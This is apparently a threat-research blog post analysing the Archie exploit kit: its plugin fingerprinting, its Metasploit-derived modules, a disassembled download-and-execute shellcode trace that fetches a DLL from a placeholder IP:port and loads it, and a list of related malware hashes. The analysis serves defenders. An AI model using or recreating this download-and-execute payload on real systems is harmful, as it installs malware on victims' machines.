We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems. The number of Exploit Kits available has experienced exponential growth in the last few years. Since Blackhole’s author was arrested in 2013, the number of Exploit Kits has increased - including Neutrino, Magnitude, Nuclear, Rig and Angler. In this blog post we discuss Archie, an Exploit Kit that was first discovered by William Metcalf. Archie is a really basic Exploit Kit that uses different exploit modules copied from the Metasploit Framework. When the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information about Flash, Silverlight and Acrobat Reader versions and the information is sent to the server. It also uses the following trick to check whether or not the system is running a 64-bit version of Internet Explorer. We documented this trick in previous blog posts. Depending on the Silverlight, Internet Explorer and Flash versions, it will try to load a different exploit module including: Archie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them. If we disassemble the shellcode we can see it is a basic download and execute payload. 4010bb     LoadLibraryA(urlmon)401089     VirtualAlloc(base=0 , sz=400) = 600004010ce     GetTempPath(len=104, buf=60000) = 144010a7     URLDownloadToFile(http://IPADDRESS:PORT/dd, C:usersuserTempe.dll)401108     LoadLibraryA(C:usersuserTempe.dll)401114     Sleep(0x3a98) The shellcode downloads a DLL from the webserver, writes it in Users[Current_user]Tempe.dll and then loads it. The IP address where the Archie Exploit Kit is hosted, and the piece of malware delivered, is also being used for click fraud operations. It is related to this research published by Kimberly on the click fraud bot http://stopmalvertising.com/malware-reports/anatomy-of-a-net-click-fraud-bot.html [no longer available]. Following is the list of hashes that we have found connecting to the same C&C: 17b077840ab874a8370c98c840b6c6717bd2207dcef1878109e88a4527162d0989c136eae9163d63918e0ef59bd6ac82d1b11795c3e3736de834abc39f7bd76a1d648b48d1e2b0f2855e2659f32c94ad48feab46efc26519820e5b8a9152e529e54d5fef5e3c050f529e814dca4d801483f5aef0de9da8cb813c5c8ffbaf1eadb47739296783ac7fced9ccb49c833ae809102b0fe2be8b85136d454b14ec7398dbcb2d297e5d79c5a161801b2be775ba30b729137b5ee8805e3e9cc1dbb75609a615334472c30ee680f798e3849def668268f911c87a33f29c00af1dd2c1c2a6389c5931703a031faebf5f5406f867522da11eb62f514abc2ea68271655cb791 About the Author: Jaime Blasco Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AT&T Cybersecurity, Jaime leads the Alien Labs Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AT&T, Jaime was Chief Scientest at AlienVault. Prior to that, he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera. Read more posts from Jaime Blasco ›